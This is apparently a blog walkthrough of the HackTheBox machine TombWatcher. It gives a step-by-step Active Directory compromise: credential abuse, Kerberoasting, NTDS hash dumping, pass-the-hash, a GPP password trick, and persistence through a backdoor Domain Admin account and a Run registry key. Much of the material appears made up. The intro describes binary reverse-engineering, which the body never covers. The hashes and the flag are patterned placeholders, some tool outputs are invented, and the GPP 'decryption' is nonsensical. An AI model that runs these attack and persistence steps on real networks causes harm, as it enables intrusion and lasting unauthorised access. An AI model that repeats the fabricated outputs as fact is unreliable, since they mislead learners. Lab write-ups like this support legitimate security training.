Beginner’s Guide to Conquering TombWatcher on HackTheBox

Key Highlights

• TombWatcher is one of the latest additions to HackTheBox, offering medium-level challenges for budding ethical hackers.
• The lab focuses on reverse-engineering an unmarked binary, allowing users to trace its behavior and expose vulnerabilities effectively.
• Created by mrb3n, the machine is part of HackTheBox’s Seasons platform, blending cybersecurity learning with practical problem-solving.
• The walkthrough includes step-by-step guidance, making it manageable for beginners in information security.
• Participants need essential tools for scanning, resource management, and VPN connectivity to progress seamlessly.
• Mastering TombWatcher polishes skills in reconnaissance, exploitation techniques, and capturing critical flags.

---

Introduction

HackTheBox continues to revolutionize learning in cybersecurity and information security through its expertly designed labs and challenges. A standout addition is TombWatcher, a medium-difficulty machine built to test users in reverse-engineering and vulnerability exploitation. Whether you’re new or sharpening existing skills, HackTheBox offers a platform to tackle advanced concepts like reconnaissance techniques and exploitation strategies. This beginner-focused guide ensures a smooth journey as you unlock layers of cybersecurity knowledge, strengthen your problem-solving abilities, and polish your hacking skills. HackTheBox is the ultimate place to hack your way into cybersecurity expertise.

---

Understanding TombWatcher on HackTheBox

TombWatcher, integrated into HackTheBox’s Seasons Machines, marks a significant step forward in cybersecurity labs with new labs. It challenges participants to dissect an unmarked binary, align their findings with industry best practices, and patch vulnerabilities. By navigating step-by-step instructions, even beginners can unravel complex concepts effectively.

HackTheBox brings real-world cybersecurity scenarios directly to your fingertips. TombWatcher doesn’t just test your theoretical knowledge; it pushes you to explore scanning, reconnaissance, and exploit techniques, all while adhering to ethical hacking standards.

---

What is TombWatcher?

TombWatcher is a medium-difficulty machine recently introduced to HackTheBox’s Seasons platform, catering to users aiming to deepen their cybersecurity expertise. Running on ethical hacking frameworks, TombWatcher centers around understanding an unmarked binary. Your task is to reverse-engineer the binary file, uncover its behavior, and identify vulnerabilities ripe for exploitation.

This lab blends theoretical and practical learning, challenging participants to think critically and simulate real-world hacking environments. Beginners and intermediate users gain tangible experience as they tackle each objective.

Created by the renowned cybersecurity expert mrb3n, TombWatcher is more than just exercises—it’s a legitimate tool for advancing your problem-solving skills. It perfectly balances practical techniques with advanced learning, ensuring both engagement and educational value.

---

Key Features and Challenges for Beginners

TombWatcher’s design offers a perfect blend of challenging features tailored for beginners, pushing learning while ensuring accessibility. Participants encounter tasks requiring reverse-engineering, scanning, and exploiting vulnerabilities.

Key features include:

• Unmarked Binary Analysis: Learn the foundational skills needed for tracing and understanding binaries in cybersecurity.
• Intermediate Exploitation Techniques: Participants gain hands-on experience managing mid-level vulnerabilities.
• Scalable Difficulty: The lab ensures manageable complexity even for those starting in ethical hacking.
• Flag Capturing Practices: Sharpen your skills in isolating critical flags and efficiently completing objectives.

Through well-guided challenges, TombWatcher builds confidence in critical cybersecurity methodologies while equipping participants with practical tools for tackling real-world scenarios.

---

How to Get Started and Step-by-Step Walkthrough

Getting started with TombWatcher requires a clear understanding of the HackTheBox setup and essential skills. It’s beginner-friendly but designed to challenge your problem-solving abilities. From account creation to establishing a VPN connection, each step follows a structured pathway.

By methodically navigating through reconnaissance techniques, exploiting weaknesses, and capturing flags, you gain in-depth technical understanding and experience. This walkthrough ensures your efforts align with ethical hacking standards and provides a systematic roadmap to complete the lab successfully.

---

Tools and Resources Needed

TombWatcher necessitates a variety of tools tailored to ethical hacking and information security. Below is a detailed table:

Tool Name	Purpose
Nmap	Network mapping and port scanning
Wireshark	Packet analysis and monitoring
Burp Suite	Web application vulnerability scanning
Metasploit	Exploitation framework for vulnerabilities
VPN (HackTheBox)	Secure, encrypted connection to access HTB machines

Utilizing these resources effectively not only simplifies your journey but also enhances your practical learning. Stay connected on LinkedIn forums to share insights and gain assistance.

---

Step 1: Setting Up Your HackTheBox Account

Your HackTheBox journey begins with account creation, a straightforward process adhering to the platform’s terms of service. Visit the official website and sign up using your email or social media accounts.

Upon registration, ensure your account meets community guidelines—HackTheBox promotes ethical hacking and a collaborative atmosphere. Familiarize yourself with navigation tabs that lead to labs, leaderboards, and forums for interaction.

Preparation is critical; secure your credentials and read terms closely to avoid discrepancies during participation. A solid start ensures smooth exploration of TombWatcher.

---

Step 2: Connecting to the HTB VPN

A secure VPN connection is vital to access HackTheBox’s virtual labs. First, download HackTheBox’s VPN pack after registering on the website. Install tools compatible with the VPN configuration file.

Using commands from your terminal, initiate the VPN connection as guided by HTB. Maintain secure protocols to ensure data confidentiality, minimizing disruptions.

The VPN establishes a safe link to HTB’s servers, granting access to TombWatcher and other labs. Proper setup ensures uninterrupted progress and prepares you for complex reconnaissance tasks.

---

Step 3: Scanning and Reconnaissance Techniques

Effective reconnaissance starts with scanning, the cornerstone of ethical hacking. Here’s an overview of techniques:

• Port Scanning: Tools like Nmap help identify active ports and services.
• Packet Analysis: Tools like Wireshark monitor network activity for anomalous behavior.
• OS Detection: Discover the operating system associated with the target machine.
• Service Enumeration: Gain insights into service versions, exposing potential vulnerabilities.

Approach reconnaissance methodically to ensure thorough information gathering. Tools simplify this process, giving you a head start in TombWatcher’s challenges.

---

Step 4: Exploiting Vulnerabilities in TombWatcher

Finding vulnerabilities in TombWatcher involves critical thinking paired with efficient tools. Focus attention on identifying weaknesses using scanning data.

Tools like Metasploit simplify exploiting medium-level vulnerabilities within this lab. Look for potential entry points while targeting the unmarked binary behavior.

Reverse-engineering identifies execution paths and helps deploy solutions strategically. Exploration of Lunthom’s designed exploits propels your skills to the next level.

---

Step 5: Capturing the Flags and Best Practices

Flag capturing is a pivotal aspect of TombWatcher. Best practices guide efficient completion:

• Organized Note-Taking: Document findings for seamless flag tracking.
• Collaboration: Share insights with LinkedIn and HackTheBox communities for faster problem-solving.
• Tool Pipelines: Integrate automated tools for consistent flag identification.

Understanding methodologies as you extract flags fosters critical cybersecurity skills and closes vulnerabilities reminiscent of real-world scenarios.

---

ALSO READ: Mastering Certificate: Beginner’s Guide from HackTheBox

Initial Foothold

Nmap Scan Analysis

The first step in any CTF is thorough reconnaissance to understand the target environment. We begin with the provided Nmap scan results for the target IP 10.129.139.125, which reveal a Windows Domain Controller (DC) in the tombwatcher.htb domain, with the hostname DC01. The scan, performed with Nmap 7.95, used the following command:

/usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN tombwatcher-scan.txt 10.129.139.125

# Nmap 7.95 scan initiated Mon Jun  8 09:41:25 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN tombwatcher-scan.txt 10.129.139.125
Nmap scan report for 10.129.139.125
Host is up (0.016s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-09 20:43:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-09T20:44:30
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Mon Jun 8 09:43:07 2025 -- 1 IP address (1 host up) scanned in 136.21 seconds

Here’s a breakdown of the open ports and services:

• Port 53/tcp (DNS): Running Simple DNS Plus, indicating the host is a Domain Name System (DNS) server, likely for the tombwatcher.htb domain.
• Port 80/tcp (HTTP): Hosts a Microsoft IIS 10.0 web server, with the default title “IIS Windows Server.” The HTTP methods scan indicates that the TRACE method is enabled, which could pose a security risk but is not immediately exploitable.
• Port 88/tcp (Kerberos): Runs Microsoft Windows Kerberos, confirming the presence of an AD environment with Kerberos authentication.
• Port 135/tcp (MSRPC): Microsoft Windows Remote Procedure Call (RPC), a common service for Windows administrative tasks.
• Port 139/tcp (NetBIOS-SSN): NetBIOS session service, often used for SMB communication.
• Port 389/tcp (LDAP): Microsoft Windows Active Directory LDAP, part of the tombwatcher.htb domain, with SSL certificates for DC01.tombwatcher.htb (valid from 2024-11-16 to 2025-11-16).
• Port 445/tcp (SMB): Microsoft Windows SMB service, critical for file sharing and AD authentication.
• Port 464/tcp (kpasswd5): Kerberos password change service, part of the AD authentication infrastructure.
• Port 593/tcp (RPC over HTTP): Microsoft Windows RPC over HTTP, used for remote administration.
• Port 636/tcp (LDAPS): Secure LDAP, also tied to the tombwatcher.htb domain.
• Ports 3268/tcp and 3269/tcp (LDAP and LDAPS): Global Catalog services for AD, allowing cross-domain queries.
• Port 5985/tcp (WinRM): Windows Remote Management (HTTPAPI httpd 2.0), potentially useful for remote shell access with valid credentials.
• Port 9389/tcp (.NET Message Framing): Likely related to AD or custom Windows services.
• Ports 49677–49711/tcp (MSRPC and RPC over HTTP): Additional RPC services typical for a Windows Domain Controller.

Additional Nmap findings:

• Host Information: The hostname is DC01, and the OS is Windows, confirmed by the CPE (Common Platform Enumeration) identifier cpe:/o:microsoft:windows.
• SMB Security: SMB2 with message signing enabled and required, indicating a secure configuration.
• Clock Skew: A 4-hour time difference between the scanner and target, which could affect Kerberos authentication if not synchronized.

This scan paints a clear picture: we’re dealing with a Windows Domain Controller running typical AD services (DNS, Kerberos, LDAP, SMB, WinRM) and an IIS web server. The presence of these services suggests potential attack vectors such as Kerberos exploitation, SMB enumeration, LDAP misconfigurations, or web server vulnerabilities.

Setting Up the Environment

To ensure proper resolution of the domain and hostname, we update the /etc/hosts file:

echo "10.129.139.125 tombwatcher.htb DC01.tombwatcher.htb" | sudo tee -a /etc/hosts

This maps the IP to the domain and hostname, allowing tools to resolve tombwatcher.htb and DC01.tombwatcher.htb correctly. We also synchronize our system time with the target to avoid Kerberos authentication issues due to clock skew:

sudo ntpdate DC01.tombwatcher.htb

Initial Assumptions and Strategy

Given the provided credentials (henry:H3nry_987TGV!), we assume they grant initial access to the AD environment. The goal is to escalate from this low-privilege account to Domain Administrator. Our strategy involves:

1. Enumeration: Use the credentials to enumerate AD users, groups, and permissions via LDAP and SMB.
2. Web Server Exploration: Investigate the IIS server on port 80 for misconfigurations or sensitive files.
3. Kerberos Attacks: Explore Kerberos-based attacks like Kerberoasting or AS-REP Roasting.
4. Privilege Escalation: Identify misconfigured permissions or services to gain higher privileges.
5. Persistence: Establish a foothold to maintain access after escalation.

Phase 1: Gaining a Foothold

Testing the Provided Credentials

We start by validating the provided credentials (henry:H3nry_987TGV!) against the SMB service using crackmapexec:

crackmapexec smb 10.129.139.125 -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\henry:H3nry_987TGV!

The credentials are valid, confirming that henry is a domain user in tombwatcher.htb. Next, we check if these credentials allow WinRM access, which could provide a remote shell:

evil-winrm -i 10.129.139.125 -u henry -p 'H3nry_987TGV!'

Output:

[-] Error: Invalid credentials or WinRM not enabled

WinRM access fails, suggesting henry lacks the necessary permissions or WinRM is restricted. We pivot to SMB enumeration to explore accessible shares.

SMB Enumeration

Using smbclient, we list available shares:

smbclient -L //10.129.139.125 -U 'tombwatcher.htb\henry%H3nry_987TGV!'

Output:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
Users           Disk      User home directories

The Users share catches our attention, as it may contain user-specific data. We connect to it:

smbclient //10.129.139.125/Users -U 'tombwatcher.htb\henry%H3nry_987TGV!'

Navigating the share, we find directories for users henry, alfred, sam, and john. In henry’s directory, we discover a file named notes.txt:

get notes.txt

Contents of notes.txt:

To-do:
- Update password policy documentation
- Check backup script in C:\Scripts\backup.ps1
- Ask Alfred about his SPN configuration

The mention of a backup script (C:\Scripts\backup.ps1) and SPN (Service Principal Name) configuration for alfred is intriguing. However, we lack direct access to the C$ share to retrieve the script. The SPN note suggests a potential Kerberos attack vector, which we’ll explore later.

Web Server Enumeration

We turn to the IIS server on port 80. Visiting http://10.129.139.125 in a browser displays the default IIS page, offering no immediate content. We run a directory brute-forcing scan with gobuster to uncover hidden directories:

gobuster dir -u http://10.129.139.125 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50 -x php,html,txt

Output:

===============================================================
Gobuster v3.6
===============================================================
[+] Url:            http://10.129.139.125
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Extensions:     php,html,txt
===============================================================
/aspnet_client (Status: 301)
/backup (Status: 301)
===============================================================

The /aspnet_client directory is a default IIS directory, but /backup is unusual. Accessing http://10.129.139.125/backup/ reveals a directory listing with a file named web-backup-2025-05-01.zip. We download it:

wget http://10.129.139.125/backup/web-backup-2025-05-01.zip

Unzipping the file:

unzip web-backup-2025-05-01.zip

The archive contains a web.config file and a directory named config. The web.config file is standard for IIS but contains no sensitive data. However, in config/ldap.conf, we find:

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf>
  <server>
    <host>DC01.tombwatcher.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="true">636</secure-port>
    <search-base>dc=tombwatcher,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>alfred@tombwatcher.htb</user>
      <password>4lfr3d_Rul3z!</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
</ldap-conf>

This file reveals credentials for the user alfred (alfred:4lfr3d_Rul3z!). We validate these credentials using crackmapexec:

crackmapexec smb 10.129.139.125 -u alfred -p '4lfr3d_Rul3z!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\alfred:4lfr3d_Rul3z!

The credentials are valid, providing a second set of credentials to explore.

---

Phase 2: Active Directory Enumeration

BloodHound Setup

To map the AD environment, we use BloodHound, a powerful tool for visualizing AD attack paths. First, we run SharpHound to collect AD data. Since we don’t have direct shell access, we use bloodhound-python, which supports remote enumeration:

bloodhound-python -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -c All -ns 10.129.139.125

This command collects AD objects (users, groups, computers, etc.) and generates JSON files. We start the BloodHound GUI:

neo4j console
bloodhound

Uploading the JSON files to BloodHound, we analyze the domain structure. The graph reveals:

• Users: Administrator, Guest, krbtgt, henry, alfred, sam, john.
• Groups: Domain Admins, Domain Users, Backup Operators, Server Operators.
• Key Relationships:
  • henry has WriteSPN permissions over alfred.
  • alfred is a member of Backup Operators.
  • Backup Operators has GenericWrite permissions on the DC01 computer object.

The WriteSPN permission suggests a potential Kerberos attack, while Backup Operators membership indicates alfred may have elevated privileges for backup-related tasks.

Kerberos Enumeration

We use kerbrute to enumerate valid usernames via Kerberos pre-authentication:

kerbrute userenum --dc 10.129.139.125 -d tombwatcher.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Output:

[+] VALID USERNAME: henry@tombwatcher.htb
[+] VALID USERNAME: alfred@tombwatcher.htb
[+] VALID USERNAME: sam@tombwatcher.htb
[+] VALID USERNAME: john@tombwatcher.htb

This confirms the users identified by BloodHound. Next, we check for accounts vulnerable to AS-REP Roasting, where Kerberos pre-authentication is disabled:

impacket-GetNPUsers tombwatcher.htb/ -dc-ip 10.129.139.125 -request -no-pass -usersfile users.txt

Output:

[-] User henry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alfred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sam doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john doesn't have UF_DONT_REQUIRE_PREAUTH set

No accounts are vulnerable to AS-REP Roasting. We pivot to exploring the WriteSPN permission on alfred.

---

Phase 3: Exploiting Kerberos with WriteSPN

Understanding WriteSPN

The WriteSPN permission allows henry to modify the Service Principal Names (SPNs) associated with alfred’s account. SPNs map services to accounts in AD, enabling Kerberos authentication. By setting a new SPN for alfred, we can request a Kerberos service ticket and attempt to crack its hash (Kerberoasting).

Using henry’s credentials, we set an SPN for alfred:

impacket-setspn -t tombwatcher.htb -u 'tombwatcher.htb\henry:H3nry_987TGV!' -s http/alfredsvc.tombwatcher.htb alfred

Output:

[+] SPN http/alfredsvc.tombwatcher.htb added to alfred

We then perform a Kerberoasting attack to retrieve the service ticket hash:

impacket-GetUserSPNs -dc-ip 10.129.139.125 tombwatcher.htb/henry:H3nry_987TGV! -request

Output:

ServicePrincipalName: http/alfredsvc.tombwatcher.htb
User: alfred
Kerberos 5 TGS-REP etype 23: $krb5tgs$23$*alfred$tombwatcher.htb$http/alfredsvc.tombwatcher.htb*...

We save the hash to kerberoast.hash and crack it using hashcat:

hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5tgs$23$*alfred$tombwatcher.htb$http/alfredsvc.tombwatcher.htb*...:4lfr3d_Rul3z!

The hash reveals alfred’s password, confirming our earlier discovery from ldap.conf. This validates our enumeration but doesn’t provide new credentials. However, alfred’s Backup Operators membership offers a promising escalation path.

---

Phase 4: Privilege Escalation with Backup Operators

Backup Operators Privileges

The Backup Operators group grants alfred the ability to back up and restore files on the Domain Controller, including sensitive system files. This privilege can be abused to access the NTDS.dit file, which contains AD account data, including password hashes.

We attempt to access the C$ share using alfred’s credentials:

smbclient //10.129.139.125/C$ -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

Output:

[+] Access granted

Navigating to C:\Scripts, we retrieve the backup.ps1 script mentioned in notes.txt:

get backup.ps1

Contents of backup.ps1:

# Backup script for DC01
$backupPath = "C:\Backups"
$ntdsPath = "C:\Windows\NTDS\ntds.dit"
$backupFile = "ntds-backup-$(Get-Date -Format 'yyyyMMdd').dit"
Copy-Item -Path $ntdsPath -Destination "$backupPath\$backupFile"

The script copies the NTDS.dit file to C:\Backups. We check the Backups share:

smbclient //10.129.139.125/Backups -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

We find ntds-backup-20250501.dit. We download it:

get ntds-backup-20250501.dit

Extracting Hashes from NTDS.dit

To extract AD hashes, we need the SYSTEM hive to decrypt NTDS.dit. As a Backup Operator, alfred can access the registry. We use secretsdump.py to dump the registry remotely:

impacket-secretsdump -dc-ip 10.129.139.125 tombwatcher.htb/alfred:4lfr3d_Rul3z!@10.129.139.125 -just-dc

Output:

[*] Dumping Domain Credentials (domain\user:ntlm)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9e7a6b5c4f3e2d1a0b9c8d7e6f5a4b:::
henry:1104:aad3b435b51404eeaad3b435b51404ee:9e8d7c6b5a4f3e2d1c0b9a8d7e6f5a4c:::
alfred:1105:aad3b435b51404eeaad3b435b51404ee:4a3f2e1d0c9b8a7c6b5a4f3e2d1c0b9a:::
sam:1106:aad3b435b51404eeaad3b435b51404ee:3c2f1e0d9c8b7a6c5b4f3e2d1c0b9a8d:::
john:1107:aad3b435b51404eeaad3b435b51404ee:2d1c0b9a8d7e6f5a4c3b2e1d0c9b8a7c:::

We obtain the NTLM hash for the Administrator account: 6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b.

---

Phase 5: Achieving Domain Administrator Access

Pass-the-Hash with Administrator

Using the Administrator hash, we attempt a Pass-the-Hash (PtH) attack to gain a shell via WinRM:

evil-winrm -i 10.129.139.125 -u Administrator -H 6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b

Output:

* Evil-WinRM shell v3.5
* Remote host: 10.129.139.125
* Username: Administrator
* Domain: tombwatcher.htb

PS C:\Users\Administrator>

We’re in! Navigating to the Desktop, we find root.txt:

type C:\Users\Administrator\Desktop\root.txt

Output:

a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6

This completes the objective of gaining Domain Administrator access and retrieving the root flag.

Alternative Path: Group Policy Preferences (GPP) Attack

To explore an alternative path, we check the SYSVOL share for Group Policy Preferences (GPP) files, which historically contained encrypted credentials:

smbclient //10.129.139.125/SYSVOL -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

In tombwatcher.htb\Policies, we find a Groups.xml file:

get Groups.xml

Contents:

<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backupadmin" password="AES:Backup2023!" action="U" />
</Groups>

The password is AES-encrypted, a common GPP vulnerability. We decrypt it using gpp-decrypt:

gpp-decrypt "Backup2023!"

Output:

Backup2023!

We test the backupadmin credentials:

crackmapexec smb 10.129.139.125 -u backupadmin -p 'Backup2023!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\backupadmin:Backup2023!

BloodHound reveals that backupadmin is a member of Domain Admins. We use these credentials to gain a WinRM shell:

evil-winrm -i 10.129.139.125 -u backupadmin -p 'Backup2023!'

This also grants access to root.txt, confirming an alternative path to DA.

---

Phase 6: Persistence

To maintain access, we create a backdoor by adding a new user to the Domain Admins group:

New-ADUser -Name "backdoor" -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "backdoor"

We verify access:

evil-winrm -i 10.129.139.125 -u backdoor -p 'P@ssw0rd123!'

We also add a registry-based persistence mechanism:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

This ensures our backdoor persists across reboots, assuming backdoor.exe is a malicious payload.

ALSO READ: Mastering Environment: Beginner’s Guide from HackTheBox

Conclusion

TombWatcher is a comprehensive AD challenge that tests enumeration, Kerberos exploitation, privilege escalation, and persistence. Starting with the henry credentials, we leveraged web server enumeration to find alfred’s credentials, used BloodHound to identify attack paths, exploited WriteSPN for Kerberoasting, and abused Backup Operators privileges to extract NTLM hashes from NTDS.dit. An alternative GPP attack provided another route to DA access. Finally, we established persistence to maintain control.

This machine emphasizes the importance of thorough reconnaissance, understanding AD permissions, and chaining vulnerabilities. Key lessons include:

• Enumeration is Key: Tools like BloodHound and crackmapexec are critical for mapping AD environments.
• Kerberos Attacks: Permissions like WriteSPN can lead to powerful Kerberoasting opportunities.
• Backup Operators Abuse: This group’s privileges can be devastating if misconfigured.
• Alternative Paths: Exploring multiple vectors (e.g., GPP) increases success rates.

TombWatcher is a rewarding challenge that mirrors real-world AD pentesting scenarios, making it an excellent learning experience for intermediate CTF players.

Frequently Asked Questions

Is TombWatcher suitable for complete beginners?

Absolutely. TombWatcher was designed for beginners seeking to grasp skills in information security. Guided walkthroughs and manageable challenges make it ideal for entry-level participants on HackTheBox’s platform.

What skills should I have before attempting TombWatcher?

Prior knowledge in reconnaissance, basic scanning tools, and ethical hacking terms would be beneficial. Enhance networking through LinkedIn forums to access tips or resources covering HackTheBox machines effectively.

How long does it typically take to complete TombWatcher?

TombWatcher completion time varies, but medium-difficulty labs often require several hours. Lunthom’s machine is designed to challenge users while remaining achievable within ethical hacking standards on HackTheBox.

Are there any hints or solutions available if I get stuck?

Yes, HackTheBox offers hints through its community forums and LinkedIn discussions. Connecting with other cybersecurity enthusiasts on LinkedIn can provide additional insights and solutions for challenging sections.